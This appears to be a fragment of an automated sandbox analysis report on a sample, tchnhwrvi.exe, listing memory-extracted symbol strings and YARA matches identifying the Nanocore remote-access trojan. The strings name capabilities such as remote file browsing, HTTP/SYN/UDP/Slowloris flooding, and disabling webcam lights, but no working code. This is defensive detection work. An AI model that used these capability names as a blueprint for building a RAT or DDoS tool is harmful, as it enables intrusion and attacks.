sGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.566066458.0000000003381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.566066458.0000000003381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: tchnhwrvi.exe, 00000002.00000002.571793197.00000000075E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.571793197.00000000075E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
      Source: tchnhwrvi.exe, 00000002.00000002.571773496.00000000075D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.571597397.00000000073F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.565935661.0000000003332000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.571745163.00000000075B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.571745163.00000000075B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
      Source: tchnhwrvi.exe, 00000002.00000002.571864347.0000000007610000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
      Source: tchnhwrvi.exe, 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 1.2.tchnhwrvi.exe.b13658.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.441fa31.20.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.417058.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.159d2c8.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.5df4629.30.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.tchnhwrvi.exe.b00000.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.417058.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.5df0000.31.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.3290000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4e30ee8.19.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.3290000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.441b408.27.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4f8cc52.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4f91a88.22.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.5df0000.31.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.441b408.27.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4e35511.25.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.tchnhwrvi.exe.b13658.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4f91a88.22.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4d3ef95.14.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.400000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4406f6d.24.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4e30ee8.19.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.3330000.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4e2c0b2.21.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4d32d61.13.raw.unpack, type: UNPACKEDPE
